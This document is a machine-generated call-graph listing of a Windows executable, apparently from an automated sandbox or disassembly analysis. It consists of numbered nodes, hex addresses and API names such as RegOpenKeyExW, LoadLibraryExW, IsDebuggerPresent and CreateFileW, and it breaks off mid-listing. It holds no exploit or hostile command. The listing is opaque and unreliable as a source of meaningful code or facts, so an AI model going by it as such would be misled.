59 API calls 98049->98050 98050->98048 98051 f107d 98056 f71eb 98051->98056 98053 f108c 98087 112f80 98053->98087 98057 f71fb __write_nolock 98056->98057 98090 f77c7 98057->98090 98061 f72ba 98102 11074f 98061->98102 98068 f77c7 59 API calls 98069 f72eb 98068->98069 98121 f7eec 98069->98121 98071 f72f4 RegOpenKeyExW 98072 12ecda RegQueryValueExW 98071->98072 98076 f7316 Mailbox 98071->98076 98073 12ecf7 98072->98073 98074 12ed6c RegCloseKey 98072->98074 98075 110ff6 Mailbox 59 API calls 98073->98075 98074->98076 98086 12ed7e _wcscat Mailbox __wsetenvp 98074->98086 98077 12ed10 98075->98077 98076->98053 98125 f538e 98077->98125 98080 12ed38 98128 f7d2c 98080->98128 98082 f7b52 59 API calls 98082->98086 98083 12ed52 98083->98074 98084 f7f41 59 API calls 98084->98086 98085 f3f84 59 API calls 98085->98086 98086->98076 98086->98082 98086->98084 98086->98085 98170 112e84 98087->98170 98089 f1096 98091 110ff6 Mailbox 59 API calls 98090->98091 98092 f77e8 98091->98092 98093 110ff6 Mailbox 59 API calls 98092->98093 98094 f72b1 98093->98094 98095 f4864 98094->98095 98137 121b90 98095->98137 98098 f7f41 59 API calls 98099 f4897 98098->98099 98139 f48ae 98099->98139 98101 f48a1 Mailbox 98101->98061 98103 121b90 __write_nolock 98102->98103 98104 11075c GetFullPathNameW 98103->98104 98105 11077e 98104->98105 98106 f7d2c 59 API calls 98105->98106 98107 f72c5 98106->98107 98108 f7e0b 98107->98108 98109 f7e1f 98108->98109 98110 12f173 98108->98110 98161 f7db0 98109->98161 98112 f8189 59 API calls 98110->98112 98114 12f17e __wsetenvp _memmove 98112->98114 98113 f72d3 98115 f3f84 98113->98115 98116 f3f92 98115->98116 98120 f3fb4 _memmove 98115->98120 98119 110ff6 Mailbox 59 API calls 98116->98119 98117 110ff6 Mailbox 59 API calls 98118 f3fc8 98117->98118 98118->98068 98119->98120 98120->98117 98122 f7f06 98121->98122 98124 f7ef9 98121->98124 98123 110ff6 Mailbox 59 API calls 98122->98123 98123->98124 98124->98071 98126 110ff6 Mailbox 59 API calls 98125->98126 98127 f53a0 RegQueryValueExW 98126->98127 98127->98080 98127->98083 98129 f7d38 __wsetenvp 98128->98129 98130 f7da5 98128->98130 98132 f7d4e 98129->98132 98133 f7d73 98129->98133 98131 f7e8c 59 API calls 98130->98131 98136 f7d56 _memmove 98131->98136 98166 f8087 98132->98166 98135 f8189 59 API calls 98133->98135 98135->98136 98136->98083 98138 f4871 GetModuleFileNameW 98137->98138 98138->98098 98140 121b90 __write_nolock 98139->98140 98141 f48bb GetFullPathNameW 98140->98141 98142 f48da 98141->98142 98143 f48f7 98141->98143 98144 f7d2c 59 API calls 98142->98144 98145 f7eec 59 API calls 98143->98145 98146 f48e6 98144->98146 98145->98146 98149 f7886 98146->98149 98150 f7894 98149->98150 98153 f7e8c 98150->98153 98152 f48f2 98152->98101 98154 f7e9a 98153->98154 98155 f7ea3 _memmove 98153->98155 98154->98155 98157 f7faf 98154->98157 98155->98152 98158 f7fc2 98157->98158 98160 f7fbf _memmove 98157->98160 98159 110ff6 Mailbox 59 API calls 98158->98159 98159->98160 98160->98155 98162 f7dbf __wsetenvp 98161->98162 98163 f8189 59 API calls 98162->98163 98164 f7dd0 _memmove 98162->98164 98165 12f130 _memmove 98163->98165 98164->98113 98167 f809f 98166->98167 98169 f8099 98166->98169 98168 110ff6 Mailbox 59 API calls 98167->98168 98168->98169 98169->98136 98171 112e90 _raise 98170->98171 98178 113457 98171->98178 98177 112eb7 _raise 98177->98089 98195 119e4b 98178->98195 98180 112e99 98181 112ec8 DecodePointer DecodePointer 98180->98181 98182 112ef5 98181->98182 98183 112ea5 98181->98183 98182->98183 98241 1189e4 59 API calls __mbschr_l 98182->98241 98192 112ec2 98183->98192 98185 112f58 EncodePointer EncodePointer 98185->98183 98186 112f2c 98186->98183 98190 112f46 EncodePointer 98186->98190 98243 118aa4 61 API calls __realloc_crt 98186->98243 98187 112f07 98187->98185 98187->98186 98242 118aa4 61 API calls __realloc_crt 98187->98242 98190->98185 98191 112f40 98191->98183 98191->98190 98244 113460 98192->98244 98196 119e5c 98195->98196 98197 119e6f EnterCriticalSection 98195->98197 98202 119ed3 98196->98202 98197->98180 98199 119e62 98199->98197 98226 1132f5 58 API calls 3 library calls 98199->98226 98203 119edf _raise 98202->98203 98204 119f00 98203->98204 98205 119ee8 98203->98205 98211 119f21 _raise 98204->98211 98230 118a5d 58 API calls 2 library calls 98204->98230 98227 11a3ab 58 API calls 2 library calls 98205->98227 98207 119eed 98228 11a408 58 API calls 8 library calls 98207->98228 98210 119f15 98213 119f2b 98210->98213 98214 119f1c 98210->98214 98211->98199 98212 119ef4 98229 1132df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98212->98229 98216 119e4b __lock 58 API calls 98213->98216 98231 118d68 58 API calls __getptd_noexit 98214->98231 98218 119f32 98216->98218 98220 119f57 98218->98220 98221 119f3f 98218->98221 98233 112f95 98220->98233 98232 11a06b InitializeCriticalSectionAndSpinCount 98221->98232 98224 119f4b 98239 119f73 LeaveCriticalSection _doexit 98224->98239 98227->98207 98228->98212 98230->98210 98231->98211 98232->98224 98234 112fc7 _free 98233->98234 98235 112f9e RtlFreeHeap 98233->98235 98234->98224 98235->98234 98236 112fb3 98235->98236 98240 118d68 58 API calls __getptd_noexit 98236->98240 98238 112fb9 GetLastError 98238->98234 98239->98211 98240->98238 98241->98187 98242->98186 98243->98191 98247 119fb5 LeaveCriticalSection 98244->98247 98246 112ec7 98246->98177 98247->98246 98248 117e93 98249 117e9f _raise 98248->98249 98285 11a048 GetStartupInfoW 98249->98285 98251 117ea4 98287 118dbc GetProcessHeap 98251->98287 98253 117efc 98254 117f07 98253->98254 98370 117fe3 58 API calls 3 library calls 98253->98370 98288 119d26 98254->98288 98257 117f0d 98258 117f18 __RTC_Initialize 98257->98258 98371 117fe3 58 API calls 3 library calls 98257->98371 98309 11d812 98258->98309 98261 117f27 98262 117f33 GetCommandLineW 98261->98262 98372 117fe3 58 API calls 3 library calls 98261->98372 98328 125173 GetEnvironmentStringsW 98262->98328 98265 117f32 98265->98262 98268 117f4d 98269 117f58 98268->98269 98373 1132f5 58 API calls 3 library calls 98268->98373 98338 124fa8 98269->98338 98272 117f5e 98273 117f69 98272->98273 98374 1132f5 58 API calls 3 library calls 98272->98374 98352 11332f 98273->98352 98276 117f71 98277 117f7c __wwincmdln 98276->98277 98375 1132f5 58 API calls 3 library calls 98276->98375 98358 f492e 98277->98358 98280 117f90 98281 117f9f 98280->98281 98376 113598 58 API calls _doexit 98280->98376 98377 113320 58 API calls _doexit 98281->98377 98284 117fa4 _raise 98286 11a05e 98285->98286 98286->98251 98287->98253 98378 1133c7 36 API calls 2 library calls 98288->98378 98290 119d2b 98379 119f7c InitializeCriticalSectionAndSpinCount __mtinitlocknum 98290->98379 98292 119d30 98293 119d34 98292->98293 98381 119fca TlsAlloc 98292->98381 98380 119d9c 61 API calls 2 library calls 98293->98380 98296 119d39 98296->98257 98297 119d46 98297->98293 98298 119d51 98297->98298 98382 118a15 98298->98382 98300 119d93 98390 119d9c 61 API calls 2 library calls 98300->98390 98304 119d98 98304->98257 98305 119d72 98305->98300 98306 119d78 98305->98306 98389 119c73 58 API calls 4 library calls 98306->98389 98308 119d80 GetCurrentThreadId 98308->98257 98310 11d81e _raise 98309->98310 98311 119e4b __lock 58 API calls 98310->98311 98312 11d825 98311->98312 98313 118a15 __calloc_crt 58 API calls 98312->98313 98315 11d836 98313->98315 98314 11d8a1 GetStartupInfoW 98316 11d8b6 98314->98316 98320 11d9e5 98314->98320 98315->98314 98317 11d841 _raise @_EH4_CallFilterFunc@8 98315->98317 98316->98320 98321 118a15 __calloc_crt 58 API calls 98316->98321 98324 11d904 98316->98324 98317->98261 98318 11daad 98404 11dabd LeaveCriticalSection _doexit 98318->98404 98320->98318 98322 11da32 GetStdHandle 98320->98322 98323 11da45 GetFileType 98320->98323 98403 11a06b InitializeCriticalSectionAndSpinCount 98320->98403 98321->98316 98322->98320 98323->98320 98324->98320 98325 11d938 GetFileType 98324->98325 98402 11a06b InitializeCriticalSectionAndSpinCount 98324->98402 98325->98324 98329 125184 98328->98329 98330 117f43 98328->98330 98405 118a5d 58 API calls 2 library calls 98329->98405 98334 124d6b GetModuleFileNameW 98330->98334 98332 1251c0 FreeEnvironmentStringsW 98332->98330 98333 1251aa _memmove 98333->98332 98335 124d9f _wparse_cmdline 98334->98335 98337 124ddf _wparse_cmdline 98335->98337 98406 118a5d 58 API calls 2 library calls 98335->98406 98337->98268 98339 124fc1 __wsetenvp 98338->98339 98340 124fb9 98338->98340 98341 118a15 __calloc_crt 58 API calls 98339->98341 98340->98272 98346 124fea __wsetenvp 98341->98346 98342 125041 98343 112f95 _free 58 API calls 98342->98343 98343->98340 98344 118a15 __calloc_crt 58 API calls 98344->98346 98345 125066 98348 112f95 _free 58 API calls 98345->98348 98346->98340 98346->98342 98346->98344 98346->98345 98349 12507d 98346->98349 98407 124857 58 API calls __mbschr_l 98346->98407 98348->98340 98408 119006 IsProcessorFeaturePresent 98349->98408 98351 125089 98351->98272 98354 11333b __IsNonwritableInCurrentImage 98352->98354 98431 11a711 98354->98431 98355 113359 __initterm_e 98356 112f80 __cinit 67 API calls 98355->98356 98357 113378 __cinit __IsNonwritableInCurrentImage 98355->98357 98356->98357 98357->98276 98359 f4948 98358->98359 98369 f49e7 98358->98369 98360 f4982 IsThemeActive 98359->98360 98434 1135ac 98360->98434 98364 f49ae 98446 f4a5b SystemParametersInfoW SystemParametersInfoW 98364->98446 98366 f49ba 98447 f3b4c 98366->98447 98368 f49c2 SystemParametersInfoW 98368->98369 98369->98280 98370->98254 98371->98258 98372->98265 98376->98281 98377->98284 98378->98290 98379->98292 98380->98296 98381->98297 98383 118a1c 98382->98383 98385 118a57 98383->98385 98387 118a3a 98383->98387 98391 125446 98383->98391 98385->98300 98388 11a026 TlsSetValue 98385->98388 98387->98383 98387->98385 98399 11a372 Sleep 98387->98399 98388->98305 98389->98308 98390->98304 98392 125451 98391->98392 98397 12546c 98391->98397 98393 12545d 98392->98393 98392->98397 98400 118d68 58 API calls __getptd_noexit 98393->98400 98395 12547c HeapAlloc 98396 125462 98395->98396 98395->98397 98396->98383 98397->98395 98397->98396 98401 1135e1 DecodePointer 98397->98401 98399->98387 98400->98396 98401->98397 98402->98324 98403->98320 98404->98317 98405->98333 98406->98337 98407->98346 98409 119011 98408->98409 98414 118e99 98409->98414 98413 11902c 98413->98351 98415 118eb3 _memset __call_reportfault 98414->98415 98416 118ed3 IsDebuggerPresent 98415->98416 98422 11a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98416->98422 98419 118f97 __call_reportfault 98423 11c836 98419->98423 98420 118fba 98421 11a380 GetCurrentProcess TerminateProcess 98420->98421 98421->98413 98422->98419 98424 11c840 IsProcessorFeaturePresent 98423->98424 98425 11c83e 98423->98425 98427 125b5a 98424->98427 98425->98420 98430 125b09 5 API calls 2 library calls 98427->98430 98429 125c3d 98429->98420 98430->98429 98432 11a714 EncodePointer 98431->98432 98432->98432 98433 11a72e 98432->98433 98433->98355 98435 119e4b __lock 58 API calls 98434->98435 98436 1135b7 DecodePointer EncodePointer 98435->98436 98499 119fb5 LeaveCriticalSection 98436->98499 98438 f49a7 98439 113614 98438->98439 98440 113638 98439->98440 98441 11361e 98439->98441 98440->98364 98441->98440 98500 118d68 58 API calls __getptd_noexit 98441->98500 98443 113628 98501 118ff6 9 API calls __mbschr_l 98443->98501 98445 113633 98445->98364 98446->98366 98448 f3b59 __write_nolock 98447->98448 98449 f77c7 59 API calls 98448->98449 98450 f3b63 GetCurrentDirectoryW 98449->98450 98502 f3778 98450->98502 98452 f3b8c IsDebuggerPresent 98453 f3b9a 98452->98453 98454 12d4ad MessageBoxA 98452->98454 98456 12d4c7 98453->98456 98457 f3bb7 98453->98457 98486 f3c73 98453->98486 98454->98456 98455 f3c7a SetCurrentDirectoryW 98458 f3c87 Mailbox 98455->98458 98702 f7373 59 API calls Mailbox 98456->98702 98583 f73e5 98457->98583 98458->98368 98461 12d4d7 98466 12d4ed SetCurrentDirectoryW 98461->98466 98463 f3bd5 GetFullPathNameW 98464 f7d2c 59 API calls 98463->98464 98465 f3c10 98464->98465 98599 100a8d 98465->98599 98466->98458 98469 f3c2e 98486->98455 98499->98438 98500->98443 98501->98445 98503 f77c7 59 API calls 98502->98503 98504 f378e 98503->98504 98704 f3d43 98504->98704 98506 f37ac 98507 f4864 61 API calls 98506->98507 98508 f37c0 98507->98508 98509 f7f41 59 API calls 98508->98509 98510 f37cd 98509->98510 98718 f4f3d 98510->98718 98513 f37ee Mailbox 98517 f81a7 59 API calls 98513->98517 98514 12d3ae 98785 1597e5 98514->98785 98520 f3801 98517->98520 98518 12d3cd 98519 112f95 _free 58 API calls 98518->98519 98522 12d3da 98519->98522 98742 f93ea 98520->98742 98524 f4faa 84 API calls 98522->98524 98526 12d3e3 98524->98526 98530 f3ee2 59 API calls 98526->98530 98527 f7f41 59 API calls 98528 f381a 98527->98528 98745 f8620 98528->98745 98532 12d3fe 98530->98532 98531 f382c Mailbox 98533 f7f41 59 API calls 98531->98533 98534 f3ee2 59 API calls 98532->98534 98535 f3852 98533->98535 98536 12d41a 98534->98536 98537 f8620 69 API calls 98535->98537 98538 f4864 61 API calls 98536->98538 98539 f3861 Mailbox 98537->98539 98540 12d43f 98538->98540 98543 f77c7 59 API calls 98539->98543 98541 f3ee2 59 API calls 98540->98541 98542 12d44b 98541->98542 98544 f81a7 59 API calls 98542->98544 98545 f387f 98543->98545 98546 12d459 98544->98546 98749 f3ee2 98545->98749 98548 f3ee2 59 API calls 98546->98548 98550 12d468 98548->98550 98556 f81a7 59 API calls 98550->98556 98552 f3899 98552->98526 98553 f38a3 98552->98553 98554 11313d _W_store_winword 60 API calls 98553->98554 98555 f38ae 98554->98555 98555->98532 98557 f38b8 98555->98557 98558 12d48a 98556->98558 98559 11313d _W_store_winword 60 API calls 98557->98559 98560 f3ee2 59 API calls 98558->98560 98561 f38c3 98559->98561 98562 12d497 98560->98562 98561->98536 98563 f38cd 98561->98563 98562->98562 98564 11313d _W_store_winword 60 API calls 98563->98564 98565 f38d8 98564->98565 98565->98550 98566 f3919 98565->98566 98568 f3ee2 59 API calls 98565->98568 98566->98550 98567 f3926 98566->98567 98765 f942e 98567->98765 98569 f38fc 98568->98569 98571 f81a7 59 API calls 98569->98571 98573 f390a 98571->98573 98575 f3ee2 59 API calls 98573->98575 98575->98566 98578 f93ea 59 API calls 98580 f3961 98578->98580 98579 f9040 60 API calls 98579->98580 98580->98578 98580->98579 98581 f3ee2 59 API calls 98580->98581 98582 f39a7 Mailbox 98580->98582 98581->98580 98582->98452 98584 f73f2 __write_nolock 98583->98584 98585 f740b 98584->98585 98586 12ee4b _memset 98584->98586 98587 f48ae 60 API calls 98585->98587 98589 12ee67 GetOpenFileNameW 98586->98589 98588 f7414 98587->98588 99566 1109d5 98588->99566 98590 12eeb6 98589->98590 98592 f7d2c 59 API calls 98590->98592 98594 12eecb 98592->98594 98594->98594 98596 f7429 99584 f69ca 98596->99584 98600 100a9a __write_nolock 98599->98600 99895 f6ee0 98600->99895 98602 100a9f 98603 f3c26 98602->98603 99906 1012fe 89 API calls 98602->99906 98603->98461 98603->98469 98605 100aac 98605->98603 98702->98461 98705 f3d50 __write_nolock 98704->98705 98706 f7d2c 59 API calls 98705->98706 98712 f3eb6 Mailbox 98705->98712 98708 f3d82 98706->98708 98717 f3db8 Mailbox 98708->98717 98826 f7b52 98708->98826 98709 f7b52 59 API calls 98709->98717 98710 f3e89 98711 f7f41 59 API calls 98710->98711 98710->98712 98714 f3eaa 98711->98714 98712->98506 98713 f7f41 59 API calls 98713->98717 98715 f3f84 59 API calls 98714->98715 98715->98712 98716 f3f84 59 API calls 98716->98717 98717->98709 98717->98710 98717->98712 98717->98713 98717->98716 98829 f4d13 98718->98829 98723 f4f68 LoadLibraryExW 98839 f4cc8 98723->98839 98724 12dd0f 98725 f4faa 84 API calls 98724->98725 98727 12dd16 98725->98727 98729 f4cc8 3 API calls 98727->98729 98732 12dd1e 98729->98732 98731 f4f8f 98731->98732 98733 f4f9b 98731->98733 98865 f506b 98732->98865 98734 f4faa 84 API calls 98733->98734 98736 f37e6 98734->98736 98736->98513 98736->98514 98739 12dd45 98873 f5027 98739->98873 98741 12dd52 98743 110ff6 Mailbox 59 API calls 98742->98743 98744 f380d 98743->98744 98744->98527 98746 f862b 98745->98746 98748 f8652 98746->98748 99300 f8b13 69 API calls Mailbox 98746->99300 98748->98531 98750 f3eec 98749->98750 98751 f3f05 98749->98751 98752 f81a7 59 API calls 98750->98752 98753 f7d2c 59 API calls 98751->98753 98754 f388b 98752->98754 98753->98754 98755 11313d 98754->98755 98756 113149 98755->98756 98757 1131be 98755->98757 98764 11316e 98756->98764 99301 118d68 58 API calls __getptd_noexit 98756->99301 99303 1131d0 60 API calls 3 library calls 98757->99303 98759 1131cb 98759->98552 98761 113155 99302 118ff6 9 API calls __mbschr_l 98761->99302 98763 113160 98763->98552 98764->98552 98766 f9436 98765->98766 98767 110ff6 Mailbox 59 API calls 98766->98767 98768 f9444 98767->98768 98769 f3936 98768->98769 99304 f935c 59 API calls Mailbox 98768->99304 98771 f91b0 98769->98771 99305 f92c0 98771->99305 98773 f91bf 98774 110ff6 Mailbox 59 API calls 98773->98774 98775 f3944 98773->98775 98774->98775 98776 f9040 98775->98776 98777 12f5a5 98776->98777 98779 f9057 98776->98779 98777->98779 99315 f8d3b 59 API calls Mailbox 98777->99315 98780 f915f 98779->98780 98781 f9158 98779->98781 98782 f91a0 98779->98782 98780->98580 98783 110ff6 Mailbox 59 API calls 98781->98783 99314 f9e9c 60 API calls Mailbox 98782->99314 98783->98780 98786 f5045 85 API calls 98785->98786 98787 159854 98786->98787 99316 1599be 98787->99316 98790 f506b 74 API calls 98791 159881 98790->98791 98792 f506b 74 API calls 98791->98792 98793 159891 98792->98793 98794 f506b 74 API calls 98793->98794 98795 1598ac 98794->98795 98796 f506b 74 API calls 98795->98796 98797 1598c7 98796->98797 98798 f5045 85 API calls 98797->98798 98799 1598de 98798->98799 98800 11594c std::exception::_Copy_str 58 API calls 98799->98800 98801 1598e5 98800->98801 98802 11594c std::exception::_Copy_str 58 API calls 98801->98802 98803 1598ef 98802->98803 98804 f506b 74 API calls 98803->98804 98805 159903 98804->98805 98806 159393 GetSystemTimeAsFileTime 98805->98806 98807 159916 98806->98807 98808 159940 98807->98808 98809 15992b 98807->98809 98811 1599a5 98808->98811 98812 159946 98808->98812 98810 112f95 _free 58 API calls 98809->98810 98814 159931 98810->98814 98813 112f95 _free 58 API calls 98811->98813 99322 158d90 98812->99322 98817 12d3c1 98813->98817 98818 112f95 _free 58 API calls 98814->98818 98817->98518 98820 f4faa 98817->98820 98818->98817 98819 112f95 _free 58 API calls 98819->98817 98821 f4fbb 98820->98821 98822 f4fb4 98820->98822 98824 f4fdb FreeLibrary 98821->98824 98825 f4fca 98821->98825 98823 1155d6 __fcloseall 83 API calls 98822->98823 98823->98821 98824->98825 98825->98518 98827 f7faf 59 API calls 98826->98827 98828 f7b5d 98827->98828 98828->98708 98878 f4d61 98829->98878 98832 f4d61 2 API calls 98835 f4d3a 98832->98835 98833 f4d4a FreeLibrary 98834 f4d53 98833->98834 98836 11548b 98834->98836 98835->98833 98835->98834 98882 1154a0 98836->98882 98838 f4f5c 98838->98723 98838->98724 99040 f4d94 98839->99040 98842 f4d94 2 API calls 98845 f4ced 98842->98845 98843 f4cff FreeLibrary 98844 f4d08 98843->98844 98846 f4dd0 98844->98846 98845->98843 98845->98844 98847 110ff6 Mailbox 59 API calls 98846->98847 98848 f4de5 98847->98848 98849 f538e 59 API calls 98848->98849 98850 f4df1 _memmove 98849->98850 98851 f4ee9 98850->98851 98852 f4f21 98850->98852 98856 f4e2c 98850->98856 99044 f4fe9 CreateStreamOnHGlobal 98851->99044 99055 159ba5 95 API calls 98852->99055 98853 f5027 69 API calls 98862 f4e35 98853->98862 98856->98853 98857 f506b 74 API calls 98857->98862 98858 f4ec9 98858->98731 98860 12dcd0 98861 f5045 85 API calls 98860->98861 98863 12dce4 98861->98863 98862->98857 98862->98858 98862->98860 99050 f5045 98862->99050 98864 f506b 74 API calls 98863->98864 98864->98858 98866 f507d 98865->98866 98868 12ddf6 98865->98868 99079 115812 98866->99079 98870 159393 99277 1591e9 98870->99277 98872 1593a9 98872->98739 98874 f5036 98873->98874 98875 12ddb9 98873->98875 99282 115e90 98874->99282 98877 f503e 98877->98741 98879 f4d2e 98878->98879 98880 f4d6a LoadLibraryA 98878->98880 98879->98832 98879->98835 98880->98879 98881 f4d7b GetProcAddress 98880->98881 98881->98879 98885 1154ac _raise 98882->98885 98883 1154bf 98931 118d68 58 API calls __getptd_noexit 98883->98931 98885->98883 98887 1154f0 98885->98887 98886 1154c4 98932 118ff6 9 API calls __mbschr_l 98886->98932 98901 120738 98887->98901 98890 1154f5 98891 11550b 98890->98891 98892 1154fe 98890->98892 98893 115535 98891->98893 98894 115515 98891->98894 98933 118d68 58 API calls __getptd_noexit 98892->98933 98916 120857 98893->98916 98934 118d68 58 API calls __getptd_noexit 98894->98934 98896 1154cf _raise @_EH4_CallFilterFunc@8 98896->98838 98902 120744 _raise 98901->98902 98903 119e4b __lock 58 API calls 98902->98903 98913 120752 98903->98913 98904 1207c6 98936 12084e 98904->98936 98905 1207cd 98941 118a5d 58 API calls 2 library calls 98905->98941 98908 120843 _raise 98908->98890 98909 1207d4 98909->98904 98942 11a06b InitializeCriticalSectionAndSpinCount 98909->98942 98912 119ed3 __mtinitlocknum 58 API calls 98912->98913 98913->98904 98913->98905 98913->98912 98939 116e8d 59 API calls __lock 98913->98939 98940 116ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98913->98940 98914 1207fa EnterCriticalSection 98914->98904 98925 120877 __wopenfile 98916->98925 98917 120891 98947 118d68 58 API calls __getptd_noexit 98917->98947 98919 120a4c 98919->98917 98923 120aaf 98919->98923 98920 120896 98948 118ff6 9 API calls __mbschr_l 98920->98948 98922 115540 98935 115562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98922->98935 98944 1287f1 98923->98944 98925->98917 98925->98919 98949 113a0b 60 API calls 2 library calls 98925->98949 98927 120a45 98927->98919 98950 113a0b 60 API calls 2 library calls 98927->98950 98929 120a64 98929->98919 98951 113a0b 60 API calls 2 library calls 98929->98951 98931->98886 98932->98896 98933->98896 98934->98896 98935->98896 98943 119fb5 LeaveCriticalSection 98936->98943 98938 120855 98938->98908 98939->98913 98940->98913 98941->98909 98942->98914 98943->98938 98952 127fd5 98944->98952 98946 12880a 98946->98922 98947->98920 98948->98922 98949->98927 98950->98929 98951->98919 98953 127fe1 _raise 98952->98953 98954 127ff7 98953->98954 98957 12802d 98953->98957 99037 118d68 58 API calls __getptd_noexit 98954->99037 98956 127ffc 99038 118ff6 9 API calls __mbschr_l 98956->99038 98963 12809e 98957->98963 98960 128049 99039 128072 LeaveCriticalSection __unlock_fhandle 98960->99039 98962 128006 _raise 98962->98946 98964 1280be 98963->98964 98965 11471a __wsopen_nolock 58 API calls 98964->98965 98968 1280da 98965->98968 98966 119006 __invoke_watson 8 API calls 98967 1287f0 98966->98967 98970 127fd5 __wsopen_helper 103 API calls 98967->98970 98969 128114 98968->98969 98976 128137 98968->98976 99012 128211 98968->99012 98971 118d34 __lseeki64 58 API calls 98969->98971 98972 12880a 98970->98972 98973 128119 98971->98973 98972->98960 98974 118d68 __mbschr_l 58 API calls 98973->98974 98975 128126 98974->98975 98978 118ff6 __mbschr_l 9 API calls 98975->98978 98977 1281f5 98976->98977 98985 1281d3 98976->98985 98979 118d34 __lseeki64 58 API calls 98977->98979 98980 128130 98978->98980 98981 1281fa 98979->98981 98980->98960 98982 118d68 __mbschr_l 58 API calls 98981->98982 98983 128207 98982->98983 98984 118ff6 __mbschr_l 9 API calls 98983->98984 98984->99012 98986 11d4d4 __alloc_osfhnd 61 API calls 98985->98986 98987 1282a1 98986->98987 98988 1282ab 98987->98988 98989 1282ce 98987->98989 98991 118d34 __lseeki64 58 API calls 98988->98991 98990 127f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98989->98990 98999 1282f0 98990->98999 98992 1282b0 98991->98992 98994 118d68 __mbschr_l 58 API calls 98992->98994 98993 12836e GetFileType 98997 1283bb 98993->98997 98998 128379 GetLastError 98993->98998 98996 1282ba 98994->98996 98995 12833c GetLastError 99000 118d47 __dosmaperr 58 API calls 98995->99000 99001 118d68 __mbschr_l 58 API calls 98996->99001 99008 11d76a __set_osfhnd 59 API calls 98997->99008 99002 118d47 __dosmaperr 58 API calls 98998->99002 98999->98993 98999->98995 99004 127f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98999->99004 99005 128361 99000->99005 99001->98980 99003 1283a0 CloseHandle 99002->99003 99003->99005 99006 1283ae 99003->99006 99007 128331 99004->99007 99010 118d68 __mbschr_l 58 API calls 99005->99010 99009 118d68 __mbschr_l 58 API calls 99006->99009 99007->98993 99007->98995 99014 1283d9 99008->99014 99011 1283b3 99009->99011 99010->99012 99011->99005 99012->98966 99013 128594 99013->99012 99016 128767 CloseHandle 99013->99016 99014->99013 99015 121b11 __lseeki64_nolock 60 API calls 99014->99015 99032 12845a 99014->99032 99017 128443 99015->99017 99018 127f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99016->99018 99019 118d34 __lseeki64 58 API calls 99017->99019 99017->99032 99021 12878e 99018->99021 99019->99032 99020 1210ab 70 API calls __read_nolock 99020->99032 99022 128796 GetLastError 99021->99022 99023 1287c2 99021->99023 99024 118d47 __dosmaperr 58 API calls 99022->99024 99023->99012 99025 1287a2 99024->99025 99028 11d67d __free_osfhnd 59 API calls 99025->99028 99026 120d2d __close_nolock 61 API calls 99026->99032 99027 12848c 99029 1299f2 __chsize_nolock 82 API calls 99027->99029 99027->99032 99028->99023 99029->99027 99030 121b11 60 API calls __lseeki64_nolock 99030->99032 99031 11dac6 __write 78 API calls 99031->99032 99032->99013 99032->99020 99032->99026 99032->99027 99032->99030 99032->99031 99033 128611 99032->99033 99034 120d2d __close_nolock 61 API calls 99033->99034 99035 128618 99034->99035 99036 118d68 __mbschr_l 58 API calls 99035->99036 99036->99012 99037->98956 99038->98962 99039->98962 99041 f4ce1 99040->99041 99042 f4d9d LoadLibraryA 99040->99042 99041->98842 99041->98845 99042->99041 99043 f4dae GetProcAddress 99042->99043 99043->99041 99045 f5003 FindResourceExW 99044->99045 99049 f5020 99044->99049 99046 12dd5c LoadResource 99045->99046 99045->99049 99047 12dd71 SizeofResource 99046->99047 99046->99049 99048 12dd85 LockResource 99047->99048 99047->99049 99048->99049 99049->98856 99051 12ddd4 99050->99051 99052 f5054 99050->99052 99056 115a7d 99052->99056 99054 f5062 99054->98862 99055->98856 99057 115a89 _raise 99056->99057 99058 115a9b 99057->99058 99060 115ac1 99057->99060 99069 118d68 58 API calls __getptd_noexit 99058->99069 99071 116e4e 99060->99071 99062 115aa0 99070 118ff6 9 API calls __mbschr_l 99062->99070 99063 115ac7 99077 1159ee 83 API calls 5 library calls 99063->99077 99066 115ad6 99078 115af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 99066->99078 99068 115aab _raise 99068->99054 99069->99062 99070->99068 99072 116e80 EnterCriticalSection 99071->99072 99073 116e5e 99071->99073 99075 116e76 99072->99075 99073->99072 99074 116e66 99073->99074 99076 119e4b __lock 58 API calls 99074->99076 99075->99063 99076->99075 99077->99066 99078->99068 99082 11582d 99079->99082 99081 f508e 99081->98870 99083 115839 _raise 99082->99083 99084 115874 _raise 99083->99084 99085 11587c 99083->99085 99086 11584f _memset 99083->99086 99084->99081 99087 116e4e __lock_file 59 API calls 99085->99087 99109 118d68 58 API calls __getptd_noexit 99086->99109 99088 115882 99087->99088 99095 11564d 99088->99095 99091 115869 99110 118ff6 9 API calls __mbschr_l 99091->99110 99099 115668 _memset 99095->99099 99101 115683 99095->99101 99096 115673 99207 118d68 58 API calls __getptd_noexit 99096->99207 99098 115678 99208 118ff6 9 API calls __mbschr_l 99098->99208 99099->99096 99099->99101 99104 1156c3 99099->99104 99111 1158b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 99101->99111 99103 1157d4 _memset 99210 118d68 58 API calls __getptd_noexit 99103->99210 99104->99101 99104->99103 99112 114916 99104->99112 99119 1210ab 99104->99119 99187 120df7 99104->99187 99209 120f18 58 API calls 3 library calls 99104->99209 99109->99091 99110->99084 99111->99084 99113 114920 99112->99113 99114 114935 99112->99114 99211 118d68 58 API calls __getptd_noexit 99113->99211 99114->99104 99116 114925 99212 118ff6 9 API calls __mbschr_l 99116->99212 99118 114930 99118->99104 99120 1210e3 99119->99120 99121 1210cc 99119->99121 99123 12181b 99120->99123 99127 12111d 99120->99127 99222 118d34 58 API calls __getptd_noexit 99121->99222 99238 118d34 58 API calls __getptd_noexit 99123->99238 99124 1210d1 99223 118d68 58 API calls __getptd_noexit 99124->99223 99129 121125 99127->99129 99136 12113c 99127->99136 99128 121820 99239 118d68 58 API calls __getptd_noexit 99128->99239 99224 118d34 58 API calls __getptd_noexit 99129->99224 99132 121131 99240 118ff6 9 API calls __mbschr_l 99132->99240 99133 12112a 99225 118d68 58 API calls __getptd_noexit 99133->99225 99135 121151 99226 118d34 58 API calls __getptd_noexit 99135->99226 99136->99135 99138 12116b 99136->99138 99140 121189 99136->99140 99167 1210d8 99136->99167 99138->99135 99143 121176 99138->99143 99227 118a5d 58 API calls 2 library calls 99140->99227 99213 125ebb 99143->99213 99144 121199 99146 1211a1 